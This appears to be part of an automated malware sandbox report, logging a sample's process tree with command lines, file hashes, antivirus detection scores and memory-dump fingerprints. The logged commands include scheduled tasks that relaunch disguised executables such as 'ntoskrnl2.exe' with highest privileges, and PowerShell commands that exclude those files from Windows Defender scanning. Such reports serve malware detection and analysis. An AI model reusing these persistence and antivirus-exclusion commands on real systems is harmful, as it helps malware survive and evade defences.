                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:07:33:14
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\find.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:find /i /v "certutil"
                                                            Imagebase:0x7ff689990000
                                                            File size:17'920 bytes
                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 8 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDv" /sc ONLOGON /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 9 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 9 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ntoskrnl2" /sc ONLOGON /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff66e660000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff74b010000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:29
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:30
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:32
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:33
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:34
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:35
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:36
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:37
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:38
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:39
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:41
                                                            Start time:07:33:18
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:42
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                                                            Imagebase:0xed0000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 88%, ReversingLabs
                                                            • Detection: 75%, Virustotal
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                                                            Imagebase:0x5a0000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:44
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat"
                                                            Imagebase:0x7ff7b51f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:45
                                                            Start time:07:33:19
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:46
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\ntoskrnl2.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\ntoskrnl2.exe
                                                            Imagebase:0xc10000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:47
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff6dad60000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:48
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\ntoskrnl2.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\ntoskrnl2.exe
                                                            Imagebase:0xb40000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:49
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Imagebase:0x9c0000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 88%, ReversingLabs
                                                            • Detection: 75%, Virustotal
                                                            Has exited:true

                                                            Target ID:50
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Imagebase:0xd90000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:51
                                                            Start time:07:33:23
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff7a3470000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:52
                                                            Start time:07:33:27
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff717f30000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                              Execution Graph

                                                              Execution Coverage:7.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:4
                                                              Total number of Limit Nodes:0
                                                              execution_graph 7801 7ffd346cae5f 7803 7ffd346caeb6 7801->7803 7802 7ffd346cafa6 QueryFullProcessImageNameA 7804 7ffd346cb004 7802->7804 7803->7802 7803->7803

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2392216196.00007FFD346C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd346c0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID: FullImageNameProcessQuery
                                                              • String ID:
                                                              • API String ID: 3578328331-0
                                                              • Opcode ID: c7d26da5b7731919770a9544964c24bd2fb7f6d79952b8767ac7e61c24873c9d
                                                              • Instruction ID: 1e42d67d4bb19043d64b9620433b58645562b5bda94918efdf481f4a2889fc50
                                                              • Opcode Fuzzy Hash: c7d26da5b7731919770a9544964c24bd2fb7f6d79952b8767ac7e61c24873c9d
                                                              • Instruction Fuzzy Hash: BF718030618A4D8FDB68EF28D8957F977E1FB59311F10823EE84EC7291CB75A8458B81
                                                              • Instruction Fuzzy Hash: 5DE01226F0802A86FB549584C8A0BB86250EF59300F9040B9DB4EF33C1CD3DAE45EB55
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91c3cd49e5ec5995297b44fac8210c2f7b8a443ae5c903bb149213aca00019ef
                                                              • Instruction ID: 26b5ddb6a35389f8ab1e3f449b81a20379b854c48449ce54d80f1933929ce413
                                                              • Opcode Fuzzy Hash: 91c3cd49e5ec5995297b44fac8210c2f7b8a443ae5c903bb149213aca00019ef
                                                              • Instruction Fuzzy Hash: C7D0C776E195598BDB91C904C4E47987791FF59340F5542F5D80CE3242C63AEE81FB50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction ID: 04d1f5c987c48eaddb74f03021256823366f4f0b22b99d682052d99e1936fe10
                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction Fuzzy Hash: 6EC08C3861580CCFC908EB2DC89890837B0FF0B304BD200A0E10DC7271D21ADCC2D781
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction ID: 50e8b32d526d26fb05214072f7cc609a8ae39d2282440d944bd8eb793cdad308
                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction Fuzzy Hash: 8CC08C0FF0AC1AC0A92031AA18E60BCA2009FCA210FD000F2D30CE00C1AC0F24852982
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction ID: ed4996c480c138126ce251633160d3b22ece0c01a88eff0dfaad808388257bf6
                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction Fuzzy Hash: E2B01209D5680E40A91431F608D747474005F86100FC00170E608D00C2DC4F14942242
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2392216196.00007FFD346C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd346c0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H@4
                                                              • API String ID: 0-2702700947
                                                              • Opcode ID: 10b5a806065058f47d1b53eb7091d64d47801b8f447c409da9db3c0ff08da1cf
                                                              • Instruction ID: efd881d360cdf9b39b31fb6e91f81d080278710718156b164110b1c6733bae07
                                                              • Opcode Fuzzy Hash: 10b5a806065058f47d1b53eb7091d64d47801b8f447c409da9db3c0ff08da1cf
                                                              • Instruction Fuzzy Hash: 63026E31B189694FEB98FF6888A53B973D1EF9A300F540179E50ED32D2DD2DAC429B41
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2392216196.00007FFD346C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd346c0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ca80d6dc744e4aa9a80d9e10e03bb17064db72c80bdc5c437fa203c1475c148
                                                              • Instruction ID: 5d5ee6e478bceadbc657b8b6a79b71078532e303c54bac1258c7844da19a0dd2
                                                              • Opcode Fuzzy Hash: 8ca80d6dc744e4aa9a80d9e10e03bb17064db72c80bdc5c437fa203c1475c148
                                                              • Instruction Fuzzy Hash: 55513970A085098FEB98EFA4C4A5AFD77B2FF59311F550079D00AEB291CF396981CB40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2390580725.00007FFD34450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd34450000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HmD4$HmD4$HmD4$HmD4$HmD4
                                                              • API String ID: 0-3599651941
                                                              • Opcode ID: 76ce6b7b4a50ba0893bb9d879893a9328481923ca616a90422d2202da907ee89
                                                              • Instruction ID: 8e21d23d363f9d7e48a17e5f2185a8157aa80e94d4b730d8b2884a3b1cb9f080
                                                              • Opcode Fuzzy Hash: 76ce6b7b4a50ba0893bb9d879893a9328481923ca616a90422d2202da907ee89
                                                              • Instruction Fuzzy Hash: 66E11F71A18E594FEF94EF08C8A5AA4B7E1FB58304F4441FED08DE36C2CE74A9818B41
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction ID: d76700d8120413915679eb5528f3a1d245f28cc21299573542b580b01c5a2b0a
                                                              • Opcode Fuzzy Hash: b4fdcbfddbfdce7212013ef50cfa4b2c72020af14249702aa15252af31789d07
                                                              • Instruction Fuzzy Hash: 3F01677121CB0C8FD754EF0CE451AA5B7E0FB99364F50056DE58AC3661DA36E882CB45
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3822094365.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd342f0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0aabde7767a203c39eebf759505f812f55ef01f06d96a3d1f19fb904cb34d10
                                                              • Instruction ID: e52ebfb15d5328e62513669527a90f7137b9e674f4d496fe8015b56371103214
                                                              • Opcode Fuzzy Hash: e0aabde7767a203c39eebf759505f812f55ef01f06d96a3d1f19fb904cb34d10
                                                              • Instruction Fuzzy Hash: 06F0BB358086898FEB46EF2888595E57FA0EF17310F150297D458C70A2DB659558CF92
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3834169115.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction ID: 4f891ce5be974d1c8e76aeecf66fc7e693b7f92fbc2f1447b9f64d71c7487220
                                                              • Opcode Fuzzy Hash: 98586ada25f47de386a593a33681666d480159b972ae2e3eb2044f1d680a9d22
                                                              • Instruction Fuzzy Hash: D5F05432B4C9554FD765FB4CE45149873E5EF6532071600B6E16DC7563CA39EC41C744
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3834169115.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_29_2_7ffd343c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction ID: 0867862a54e442d3eb058707641e8607b0ce4af0ba291441b5c441847efd4f98
                                                              • Opcode Fuzzy Hash: 30db4393ea085a368624cc46853727be489a9e75afccba76d5a93c02f67846a3
                                                              • Instruction Fuzzy Hash: 82F05E32B4C9458FDB54EB4CE4914A877E0EF5632476600B6E15EC7563DA29EC40C750
                                                              Memory Dump Source
                                                              • Source File: 0000001D.00000002.3834169115.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
